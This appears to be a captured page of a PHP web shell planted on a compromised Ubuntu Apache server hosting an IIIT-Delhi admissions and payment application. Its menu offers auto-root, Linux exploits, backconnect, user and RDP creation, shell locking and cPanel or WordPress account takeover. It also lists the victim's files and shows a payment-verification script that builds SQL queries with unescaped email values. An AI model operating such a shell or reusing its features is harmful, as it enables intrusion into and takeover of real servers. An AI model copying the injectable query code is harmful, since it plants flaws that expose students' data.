Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cipd /
applications /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
bower_components
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
documents
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
mailer-old
[ DIR ]
drwxr-xr-x
phpmailer_manual_setup
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
uploadDoc
[ DIR ]
drwxrwxr-x
validation
[ DIR ]
drwxr-xr-x
404.php
2.86
KB
-rw-r--r--
changePassword.php
4.67
KB
-rw-r--r--
class.user-ankittill30725.php
5.29
KB
-rw-r--r--
class.user.php
5.9
KB
-rw-r--r--
common-oldbkp.php
5.19
KB
-rw-r--r--
common.php
5.99
KB
-rw-r--r--
config.php
282
B
-rw-r--r--
dashboard.php
5.13
KB
-rw-r--r--
dbconfig.php
1.29
KB
-rw-r--r--
error_log
5.69
KB
-rw-r--r--
forgotPassword.php
4.94
KB
-rw-r--r--
fpass.php
3.11
KB
-rw-r--r--
index.php
5.86
KB
-rw-r--r--
logout.php
645
B
-rw-r--r--
page-top.php
5.8
KB
-rw-r--r--
pay-bkp15722.php
8.49
KB
-rw-r--r--
pay-oldbkp.php
5.39
KB
-rw-r--r--
pay.php
5.34
KB
-rw-r--r--
personalInformations-oldofcsed...
24.15
KB
-rw-r--r--
personalInformations.php
1
KB
-rw-r--r--
register-ankittill30725.php
16.12
KB
-rw-r--r--
register-nandini.php
14.88
KB
-rw-r--r--
register-originaltill29725.php
16.71
KB
-rw-r--r--
register.php
15.72
KB
-rw-r--r--
registrationVerify.php
2.46
KB
-rw-r--r--
resetpass.php
5.26
KB
-rw-r--r--
test-error.php
430
B
-rw-r--r--
testmail1.php
1.1
KB
-rw-r--r--
verify-bkp15722.php
12.67
KB
-rw-r--r--
verify-oldbkp.php
7.15
KB
-rw-r--r--
verify.php
9.6
KB
-rw-r--r--
viewStudentDetails.php
18.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : verify-oldbkp.php
<?php ob_start(); require __DIR__ . DIRECTORY_SEPARATOR . "lib" . DIRECTORY_SEPARATOR . "config.php"; // HTML require PATH_LIB . "page-top.php"; require('config.php'); require_once 'common.php'; $applicatF = new STUDENT(); //session_start(); $email = $row['studentEmail']; $studentID= $row['studentID']; require('razorpay-php/Razorpay.php'); use Razorpay\Api\Api; use Razorpay\Api\Errors\SignatureVerificationError; $success = true; $error = "Payment Failed"; if (empty($_POST['razorpay_payment_id']) === false) { $api = new Api($keyId, $keySecret); try { // Please note that the razorpay order ID must // come from a trusted source (session here, but // could be database or something else) $attributes = array( 'razorpay_order_id' => $_SESSION['razorpay_order_id'], 'razorpay_payment_id' => $_POST['razorpay_payment_id'], 'razorpay_signature' => $_POST['razorpay_signature'] ); $api->utility->verifyPaymentSignature($attributes); } catch(SignatureVerificationError $e) { $success = false; $error = 'Razorpay Error : ' . $e->getMessage(); } } if ($success === true) { $razorpay_order_id = $_SESSION['razorpay_order_id']; $razorpay_payment_id = $_POST['razorpay_payment_id']; $studentName = $_SESSION['studentName']; $emailID = $_SESSION['emailID']; $applicationFeeAm = $_SESSION['applicationFee']; $mobileNumber = $_SESSION['contact1']; $studentID = $_SESSION['studentID']; $applicationNo = $_SESSION['applicationNo']; $paymentStatus = 'SUCCESS'; $stmt = $applicatF->runQuery("SELECT * FROM applicationfees WHERE studentID=:studentID1 and emailID='$emailID'"); $stmt->execute(array(":studentID1"=>$studentID)); $rows = $stmt->fetch(PDO::FETCH_ASSOC); $razorpay_order_ids = $rows['razorpay_order_id']; if($razorpay_order_ids<>"") { $errMSG = "You have already submited."; } else { //if($applicatF->appFeeUp($studentName, $emailID, $applicationFeeAm, $studentID, $applicationNo, $razorpay_order_id, $razorpay_payment_id, $paymentStatus)) if($applicatF->applfee($studentName, $emailID, $applicationFeeAm, $mobileNumber, $studentID, $applicationNo, $razorpay_order_id, $razorpay_payment_id, $paymentStatus )) { $successMSG = "Your application fees has been submitted successfuly.."; } else { $errMSG = "sorry , Query could no execute..."; } } } else { $paymentStatus="FAIL"; if($applicatF->applfee($studentName, $emailID, $applicationFeeAm, $mobileNumber, $studentID, $applicationNo, $razorpay_order_id, $razorpay_payment_id, $paymentStatus )) $html = "<p>Your payment failed</p> <p>{$error}</p>"; } ?> <style> table { font-family: arial, sans-serif; border-collapse: collapse; width: 100%; } td, th { border: 1px solid #dddddd; text-align: left; padding: 5px 10px; } tr:nth-child(even) { } .confirmationPage { width: 500px; margin: 0 auto; } .details { text-align:right; font-weight: bold; } </style> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Payment Details <!--<small>Control panel</small> --> </h1> <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li> <li class="active">Payment Details</li> </ol> </section> <!-- Main content --> <section class="content"> <!-- SELECT2 EXAMPLE --> <div class="box box-default"> <div class="box-header with-border"> <h3 class="box-title"><strong>Payment Details </strong></h3> <?php if(isset($errMSG)){ ?> <div class="alert alert-danger alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> <h4><i class="icon fa fa-ban"></i> <?php echo $errMSG; ?></h4> </div> <?php } else if(isset($successMSG)){ ?> <div class="alert alert-success alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> <h4><i class="icon fa fa-check"></i> <?php echo $successMSG; ?></h4> </div> <?php } ?> </div> <!-- /.box-header --> <div class="box-body" id="printableArea"> <div class="row"> <div class="col-md-12"> <?php $stmt2 = $applicatF->runQuery("SELECT * FROM applicationfees WHERE studentID=:studentID1 and emailID='$email'"); $stmt2->execute(array(":studentID1"=>$studentID)); $rows2 = $stmt2->fetch(PDO::FETCH_ASSOC); $payment_id = $rows2['razorpay_payment_id']; if($payment_id <>"") {?> <h3 class="box-title"> <button class="btn btn-primary hidden-print" onclick="printDiv('printableArea')"><span class="glyphicon glyphicon-print" aria-hidden="true"></span> Print</button> </h3> <div class="confirmationPage"> <table class="table table-bordered"> <tr > <td colspan="2"><img src="https://www.iiitd.ac.in/sites/all/themes/impact_theme/logo.png"></td> </tr> <tr> <td colspan="2"><p style="text-align: center; font-size: 15px;font-weight: bold;">CSEDU Module Admissions Dec 2021 IIIT-DELHI</p> </td> </tr> <tr> <td class="details"><label>Complete Name</label></td> <td><?php echo $rows2['studentName'];?></td> </tr> <tr> <td class="details"><label>Email ID</label></td> <td> <?php echo $rows2['emailID'];?></td> </tr> <tr> <td class="details"> <label>Contact No.</label></td> <td> <?php echo $rows2['mobileNumber'];?></td> </tr> <tr > <td class="details"><label>Application Number</label></td> <td><?php echo $rows2['applicationNo'] ;?></td> </tr> <tr> <td class="details"> <label>Order ID</label></td> <td><?php echo $rows2['razorpay_order_id'];?></td> </tr> <tr> <td class="details"><label>Payment ID</label></td> <td><?php echo $rows2['razorpay_payment_id'];?></td> </tr> <tr> <td class="details"> <label>Application Fee (Rs.)</label></td> <td> <?php echo $rows2['applicationFeeAm'];?></td> </tr> </table> </div> <?php } ?> </div> </div> <!-- first Box --> </div> </div> </section> <!-- /.content --> </div> <script > function printDiv(divName) { var printContents = document.getElementById(divName).innerHTML; var originalContents = document.body.innerHTML; document.body.innerHTML = printContents; window.print(); document.body.innerHTML = originalContents; } </script> <?php ob_end_flush(); require PATH_LIB . "page-bottom.php"; ?>
Close